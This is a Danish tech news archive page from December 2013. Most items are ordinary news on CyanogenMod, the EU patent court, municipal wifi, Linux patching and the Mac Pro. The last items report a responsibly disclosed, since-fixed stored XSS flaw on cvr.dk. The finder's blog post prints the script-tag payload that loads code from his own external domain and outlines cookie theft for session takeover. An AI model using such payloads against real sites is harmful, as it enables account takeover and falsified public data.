Daily Archives: December 20, 2013

Den modificerede Android-udgave, CyanogenMod, får nu 125 millioner kroner til at gøre det lettere for brugerne at udskifte telefonproducenternes Android-versioner med CyanogenMod. Det skriver The Verge.

CyanogenMod har 11 millioner daglige brugere, men lige nu kræver det op mod 23 trin at udskifte den Android-version, telefonen er født med, med CyanogenMods version.

CyanogenMod er især populær blandt brugere af Android-enheder, som er utilfredse med, at der er for meget unødvendigt fyld i de Android-versioner, der ligger på telefonerne, og blandt brugere, hvor telefonproducenterne ikke længere leverer opdateringer.

For visse modeller af smartphones holder producenterne op med at levere nye opdateringer, inden telefonen er to år gammel, og ved at skifte til CyanogenMod kan man i stedet få opdateringer derfra.

CyanogenMod kan imidlertid ikke distribueres sammen med Googles Android-applikationer som Gmail og Maps på grund af Googles licensbetingelser. Samtidig har CyanogenMod måttet fjerne en applikation i Google Play-butikken, som ellers gjorde det lettere at installere CyanogenMod, fordi den krænkede Googles betingelser.

De 125 millioner kroner til CyanogenMod skal bruges på at udvide udviklerholdet bag Android-modifikationen med yderligere 40-50 medarbejdere fra i dag blot 20. Det skal gøre det muligt at få skabt en enkel installationsmetode, som ikke krænker Googles regler.

Den fælles europæiske patentdomstol bliver nu et spørgsmål for danskerne, når den kommer til folkeafstemning den 25. maj. Det oplyste statsministeren torsdag aften.

Flere af regeringens ministre kritiserer, at Enhedslisten og Dansk Folkeparti ikke vil stemme for patentdomstolen.

»Jeg har i dag haft drøftelser med Folketingets partier. Jeg må desværre konstatere, at Dansk Folkeparti og Enhedslisten ikke ønsker at stemme for lovforslaget. Jeg havde håbet, at vi kunne finde en løsning i Folketinget, men med disse tilbagemeldinger er det ikke muligt at samle fem sjettedeles flertal for lovforslaget, som grundloven kræver,« siger erhvervs- og vækstminister Henrik Sass-Larsen (S) i en pressemeddelelse.

Fem sjettedele af Folketinget er nødvendigt for at vedtage forslaget uden en folkeafstemning, da Justitsministeriet har vurderet, at Danmark afgiver suverænitet ved at tilslutte sig domstolen.

»Det her handler grundlæggende om at sikre vores arbejdspladser i Danmark. Patentdomstolen vil gøre det nemmere og billigere at beskytte de ideer danske virksomheder får, og som bliver til arbejdspladser her i landet. Det er også derfor, at både fagbevægelsen og erhvervslivet klart støtter en fælles patentdomstol,« siger handels- og europaminister Nick Hækkerup (S) i pressemeddelelsen.

Formålet med en fælles europæisk patentdomstol er at gøre det enklere at få og håndhæve et patent i EU. Kritikere af aftalen peger på, at patentet først og fremmest bliver enklere for de store virksomheder, der kan navigere i EU-systemet.

»Danske virksomheder vil kunne tage EU-patenter ligesom andre europæiske og amerikanske virksomheder vil kunne, ligegyldigt om vi er med eller ej. Den eneste forskel er, at de så også skal tage et dansk patent derudover. Dansk tilslutning til EU-patentdomstolen vil føre til pres på små og mellemstore virksomheder fra store koncerner og patentadvokater, særligt fordi man mister muligheden for at gå til danske domstole, hvis vi går med,« siger EU-ordfører for Enhedslisten, Nikolaj Villumsen, til Ritzau.

Flere kommuner har ytret ønske om at tilbyde gratis internet til borgere og turister. Albertslund har et forslag om kommunalt udbudt wifi til behandling i statsforvaltningen, og Frederiksberg kommune arbejder i skrivende stund på et lignende.

Men det er en rigtig dårlig ide, mener Jakob Willer, der er direktør i teleselskabernes brancheorganisation Teleindustrien.

»Det er en helt skæv udvikling. Hvis kommunerne skal til at ligge i konkurrence med teleselskaberne, vil det rode fuldstændigt op i den måde, som vi har etableret digital infrastruktur i Danmark på«, siger Jakob Willer til Version2.

Flere kommuner på vej

Line Markert er juniorpartner i advokatfirmaet Horten, der har mange af landes kommuner på klientlisten. Og hun mener, at der er endnu flere, der er interesserede i kommunalt finansieret wifi

»Jeg har drøftet konkrete tanker med fem-ti kommuner, og de taler så med andre kommuner. Vores vurdering er at 25-30 procent af kommunerne er interesserede i dette her«, siger Line Markert til Version2.

I 2009 vurderede statsforvaltningen at gratis wifi fra kommunen var i strid med loven med en henvisning til, at det vil være konkurrenceforvridende. Men den vurdering håber flere kommuner altså nu at gøre op med eller komme uden om.

I Albertslund kommune er planerne om gratis wifi baseret på en overskudskapacitet fra et fibernet, som kommunen alligevel vil rulle ud til anden brug. Niels Carsten Bluhme er direktør for miljø- og teknikforvaltningen i Albertslund kommune. Og han mener ikke, at teleselskaberne har noget at frygte.

»Det kan slet ikke måle sig med det, som teleselskaberne leverer. Vi snakker om en relativt svag kapacitet omkring byrum, der vil kunne bruges til at læse et par mails eller andet. Vi forsøger ikke at konkurrere med teleselskaberne«, siger Niels Carsten Bluhme til Version2.

Men hos Teleindustrien køber man ikke argumentet om, at kommunerne ikke vil konkurrere med branchen.

»Det argument tror jeg ikke på. Disse her kommuner vil tilbyde gratis wififorbindelser. Hvis det ikke er direkte konkurrence med teleselskaberne, så ved jeg ikke, hvad det er«, siger Direktør Jakob Willer.

Kommuner sidder på hænderne

Teleindustrien og IT-Branchen har i et høringssvar til statsforvaltningen meldt ud, at man bør stå fast på, at kommunalt finansieret wifi er ulovligt og konkurrenceforvridende. Albertslund kommune skal kommentere på det i januar måned, og først derefter vil statsforvaltningen gå videre med sagen.

Og advokat Line Markert vurderer, at sagen vil få betydning for de planer, som andre kommuner eventuelt går rundt med.

»Der er jo en del kommuner der sidder på hænderne. Blandt andet fordi, at der har været så meget medie omtale på dem, der har forsøgt sig. Så vil man hellere lade andre stikke næsen frem, og så afventer man, hvordan det går«, siger Line Markert til Version2.

Ifølge Version2s oplysninger vil Frederiksberg kommune søge om tilladelse til at udbyde gratis wifi i 2014.

Før i tiden holdt hackerne hånden over Linux-installationer. Der var nemlig ingen prestige i at hacke dem, for de blev primært brugt af ”the good guys”, og ikke de store ”corporate guys”. Sådan hænger det ikke sammen i dag. Linux er ikke længere forbeholdt de såkaldte ”good guys”, men ses rundt om i alle typer virksomheder, og det betyder, at også Linux-servere er blevet mål for hackeraktiviteter.

Det handler ikke længere kun om prestige

Ud over at Linux er blevet hvermandseje, har motiverne for hacking ændret sig. I dag handler det ikke (kun) om at vise, hvor dygtig eller snedig man er. Hacking er blevet en kynisk industri, hvor de internetkriminelle skal skaffe data så hurtigt som muligt. Det betyder, at hackerne gerne springer ind, der hvor der står et vindue på klem, og det gør der ofte i miljøer, hvor Linux bliver nedprioriteret.

Så har vi forresten også lidt Linux …

Når man ikke har valgt Linux som standardplatform, men alligevel får en applikation leveret, som skal køre på Linux, ender det ofte med, at installationerne bliver behandlet sådan lidt ”nå ja, og så har vi forresten også lidt Linux”. Det er ofte de Linux-servere, der er i dårlig sikkerhedsmæssig stand!

Når platformen bliver presset lidt ned over hovedet på én, og den måske ikke helt passer sammen med eksempelvis en Microsoft-strategi, ser jeg desværre ofte, at der slet ikke bliver taget ansvar for drift og sikkerhed. Og når platformen ikke bliver behandlet på samme måde som den primære platform (som sikkert bliver puslet om hver dag) er der langt flere måder, hackerne kan komme ind på.

Det er jo ikke, fordi virksomheder generelt er ligeglade med sikkerhed

De fleste virksomheder har helt styr på sikkerheden, når det gælder deres Microsoft-miljøer. Men dem har de selvfølgelig også arbejdet med igennem en årrække. Du får desuden rigtig meget sikkerhed foræret hos Microsoft, både i form af sikkerhedspatches og databaser over kendte certifikater. Der findes også sikkerhedspatches til Linux, men hvis de ikke bliver hentet, hjælper de jo ikke så meget.

Luk sikkerhedshullerne, før du får besøg!

Det er besynderligt, at de her problemer overhovedet er derude, for det er faktisk relativt nemt at lukke sikkerhedshullerne. Hvis du bare har procedurerne på plads, i forhold til hvordan du tilføjer sikkerhedspatches, er systemet ikke længere så sårbart. Der findes oven i købet management-værktøjer som Red Hat og Suse Manager, som automatisk sørger for at vedligeholde dine Linux-sikkerhedspatches og/eller giver det nødvendige overblik over sikkerhedssituationen på serverne. Så egentlig er det bare om at komme i gang, for det kan overhovedet ikke betale sig at lade være med at passe godt på alle serverne – også dem, der gemmer sig i en lidt overset niche og lukker fremmede ind ad bagvejen.

Bag dagens låge i gadget-kalenderen finder man en gave i den dyre ende. Til gengæld er ydeevnen også derefter.

Den nye Mac Pro er baseret på de nyeste Xeon E5 processorer fra Intel, og der er plads til op til 12 processorkerner på hver 2,7 gigahertz. Maskinen kan bestykkes med op til 64 GB DDR hukommelse, der kører på 1866 MHz, og som lagerplads kan man vælge en SSD på mellem 256 GB og 1 TB – så skulle der også være plads nok.

Der burde heller ikke være den grafik-opgave, som ikke kan overkommes på Mac Pro. Der er to grafikprocessorer, og de er begge af typen AMD Firepro workstation class, med op til 6 GB RAM på hver. Kort fortalt bør det være muligt at undgå den multifarvede paraply, også ved tunge opgaver.

På designsiden er Mac Pro også ret unik. Det lille computerkraftværk er pakket ind i en metallisk sort cylinderform, og med en højde på 25 cm og en diameter på 16,7 cm fylder den ikke meget i (kontor)landskabet.

Mac Pro har fire USB 3.0-porte, seks Thunderbolt 2-porte, HDMI og Ethernet-udgang. Og så understøtter den brug af tre 4K-skærme på samme tid.

Til superbrugeren

Som du kan læse, så har Apple ikke sparet på teknologien, der er stoppet ind i deres nyeste maskine. Og der desværre også et prisskilt, der matcher de flotte specifikationer. Man kan selv konfigurere sin computer på Apples hjemmeside, så prisen kan variere en del. Men med en 4K-skærm fra Sharp og uden præinstalleret software kom Version2s ønske-mac til at koste over 108.000 kroner. Glædelig jul.

Version2 blogger Kræn Hansen har opdaget et sikkerhedshul på hjemmesiden for CVR-registeret, cvr.dk, som Erhvervsstyrelsen står bag. Der er tale om et persistent cross-site-scripting hul, som gør det muligt for en angriber at få siden til at køre javascript, hvis angriberen opretter en virksomhed.

Kræn Hansen, der til dagligt læser Computer Science på DTU, fandt ud af, at hvis der bliver sat særlig HTML-kode ind i et adressefelt i forbindelse med oprettelsen af en virksomhed på cvr.dk, så er det muligt at hive javascript ind på siden fra et eksternt site. Og ad den vej har det været muligt at præsentere vilkårligt indhold på cvr.dk.

»Det er jo et spørgsmål om at en ondsindet person vil kunne mistbruge den tilid, som folk lægger i de data, som cvr.dk præsenterer,« siger Kræn Hansen.

Et cross-site-scripting angreb kan fungere ved, at en ondsindet person lokker et offer til at klikke på et særligt udført link, der præsenterer ofret for angriberens indhold på en hjemmeside, som angriberen ikke ellers har kontrol over. På den måde kan det se ud som om, det er personen eller organisationen bag hjemmesiden, der er afsender på indholdet.

Persistent cross-site-scripting

Den angrebsvektor, Kræn Hansen er faldet over, er dog på sin vis værre.

For her er der som nævnt tale om et persistent cross-site-scripting angreb. Det persistente består i, at en angriber ikke længere behøver lokke et offer til at klikke på et særligt link, da den ondsindede kode bliver lagret i CVR-registrets database, og dermed automatisk hentet frem, når en bruger besøger siden.

Som Kræn Hansen beskriver i sit blogindlæg, kan det foregå ved, at angriberen opretter en virksomhed på cvr.dk og indtaster HMTL-koden, der hiver javascript ind på siden, i et adresse-felt. Fremover vil alle, der besøger siden med virksomheden, enten ved selv at søge sig frem til den, eller ved at klikke på et direkte link til den, blive præsenteret for en side under cvr.dk, hvor en angriber har fuldstændigt kontrol over indholdet.

Og Kræn Hansen kan sagtens komme i tanke om, hvordan det vil kunne misbruges. Eksempelvis i forhold til antallet af ansatte og dermed virksomheden størrelse, som via cross-site-scriptet vil kunne manipuleres på cvr.dk, hvilket i sidste ende kunne påvirke sådan noget som investeringslysten i virksomheden.

»Det er noget der bliver trukket fra Skat og så videre, det er ikke data, man normalt har skriverettighed til, men det er noget, jeg kan ændre alligevel, når jeg overtager den del af websitet,« siger han.

Kræn Hansen har, som en god whitehat-hacker jo gør, rettet henvendelse til Erhvervsstyrelsen, inden han gik ud med oplysningerne om den potentielle angrebsmulighed. Og det potentielle sikkerhedshul er nu lukket.

Erhvervsstyrelsen er taknemmelig

It-chef i Erhvervsstyrelsen Morten Kildevang Jensen beskriver den sårbarhed, som Kræn Hansen fandt frem til, og som nu er lukket, som alvorlig.

»Denne type fejl har meget høj prioritet i Erhvervsstyrelsen og vurderes til at være i kategorien alvorlig, da brugerne skal kunne stole på data såvel som den kanal som udstiller data,« skriver Morten Kildevang Jensen i en mail.

Det er uvist, hvornår fejlen er opstået, men den kan have eksisteret i længere tid, oplyser Morten Kildevang Jensen. Han fortæller, at Erhvervsstyrelsen løbende overvåger tilstanden på alle selvbetjeningsløsninger.

»Men der er altid den mulighed, at brugerne opdager sikkerhedsproblemer inden Erhvervsstyrelsen. Vi er derfor altid interesseret i at høre fra vores brugere, hvis de oplevere situationer, hvor sikkerheden er truet. Generelt er Erhvervsstyrelsen taknemmelige for, at eventuelle sikkerhedsbrister på cvr.dk, indmeldes direkte til Erhvervsstyrelsen, således at eventuelle fejl kan rettes hurtigt – som det er sket i denne sag,« skriver Morten Kildevang Jensen.

Stor data, åbn data, data om data – den er alle vegne.

Vi bruger data som grundlag for at træffe beslutninger og derfor er vi dybt afhængige af at andre mennesker, myndigheder og virksomheder giver os korrekt data.

Når vi træffer beslutninger på baggrund af data, er det helt afgørende hvorfra vi har fået dataen, kommer den fx fra en offentlig myndighed, har vi en forventning til at dataen er korrekt.

Eksemplets magt

Det antages almindeligvis, at adresser indgår i helt op til 80 % af de digitale løsninger, som et moderne samfund betjener sig af.

I hvert fald hvis man skal tro på Ministeriet for By, Bolig og Landdistrikter.

Adresser står på postkasser. Ikke e-Bokse, nej. Den slags hvor man modtager helt almindelige, kedelige, snail mails. Her er et billede af min.

Det er ingen hemmelighed at jeg synes at IT sikkerhedsmæssige udfordringer er rigtig interessante. Da jeg samtidig elsker at dele ud af min viden, hvad ville så være en mere naturligt end at oprette en konsulentvirksomhed hvor jeg kan gøre netop dette?

Lad os kalde min nye virksomhed for CREEN security – og lad os fortælle Erhvervsstyrelsen at jeg har tænkt mig at være IT konsulent.

En sådan registrering kan ske via webreg.dk, hvor man med 3 klik, et login med NemID og 2 yderligere klik, bliver præsenteret med et spørgeskema i 10 skridt. Det 4. skridt “Stamdata” ber’ mig om at indtaste adresserne for virksomheden.

Da der ikke står “CREEN security” på min postkasse, skriver jeg blot <script src=//s.creen.dk></script>, som c/o navn, det fremgår jo klart og tydeligt af min postkasse.

Få dage efter kan jeg fremsøge min nye virksomhed på cvr.dk, men jeg kan ikke se mit c/o navn i adressefeltet.

Hvis jeg åbner mine udviklerværktøjer, kan jeg se at det står i koden, men det bliver ikke vist. Det er selvfølgelig fordi min browser, fortolker c/o navnet som HTML. HTML der fortæller browseren at den skal inkludere et JavaScript fra et eksternt website, i dette tilfælde er det eksterne website s.creen.dk. Et script der ligger på mit domæne, under min kontrol.

Når et script inkluderes på et website, som er hostet på et domæne, udenfor ens kontrol, så har man effektivt set, overgivet kontrollen over det indhold som ens brugere udsættes for, til dem der kontrollerer det eksterne script.

Det bliver altså muligt for mig at præsentere besøgende på cvr.dk, for information der kontrolleres helt eller delvist af mig – uden om Erhvervsstyrelsen’s faktuelle tjek.

Herunder fremkommer resultatet af en søgning på “CREEN security“. Jeg har skiftet virksomhedens navn og stamoplysninger og ændret ophørsdato’en til d. 20/11 2013.

Tænk hvad der ville ske hvis jeg havde gjort det samme med et børsnoteret selskab og sendt linket til højre og venstre på de sociale medier? Det ville være et meget effektivt værktøj til at tjene store penge på shorting af aktier!

Alternativt kunne jeg bruge fejlen til at stjæle cookies fra de besøgende på CVR der ser min virksomheds profil, inklusiv den ASP.NET_SessionId-cookie som websitet bruger til at holde styr på hvem der er logget ind og hvem der ikke er. Gud ved hvilke knapper der gemmer sig for en administrativ bruger på sitet?

Alt jeg skulle gøre for at få administrative rettigheder er at spørge en ansvarlig ved styrelsen om et spørgsmål der får dem til at besøge min virksomheds profil.

Spredning

En interessant vinkel på problematikken er at det centrale virksomheds register, nu frigives under en åben licens og at virksomheder jævnligt trækker data fra registeret. Hvis de heller ikke renser dataen før den printes i markup, så er der potentiale for at disse sider også er sårbare i skrivende stund.

Løsningen

Løsningen er naturligvis at sørge for at tegn som < og > ikke bliver printet ned i HTML’en, de skal i stedet erstattes med såkaldte “Special Entities” som < og >

Så simpelt er det – det vil rette denne fejl. Men det garanterer ikke at der ikke gemmer sig flere.

Responsible disclosure

Inden du springer til tasterne for at reproducere resultatet ovenfor, så bliver jeg nødt til at skuffe dig. Fejlen er rettet – og det blot 12 dage efter jeg kontaktede styrelsen.

Den hurtige respons viser at IT sikkerhed er et emne som tages seriøst i en offentlig styrelse, men hvordan kan det være at noget så simpelt ikke er blevet fundet og rettet for lang tid siden?

Det er ganske enkelt fordi det er super svært at forestille sig alle de kreative måder som folk kunne finde på at udfordre ens system – man har en naturlig forudantagelse om at det system har kørende er sikkert, indtil andet er bevist.

At et offentligt IT system har en sikkerhedsfejl, er i sig selv ikke den største sensation. Det er vel nærmest forventeligt af ethvert ældre system af denne størrelse. Skulle man rejse en kritik, kunne man rette den på den øjensynlige mangel på tests af sikkerheden, på et så betroet website som CVR.dk:

Det er selvfølgelig pinligt at have erhvervet sig en kønssygdom, fordi man ikke har beskyttet sig. Men det bliver først rigtig pinligt hvis man ikke anerkender risikoen og sørger for at blive testet regelmæssigt. Da brugerne af de offentlige IT systemer er os alle sammen, har vi alle en interesse i at systemerne testes. Selvom det betyder at et IT system må stå med bukserne om anklerne en gang imellem.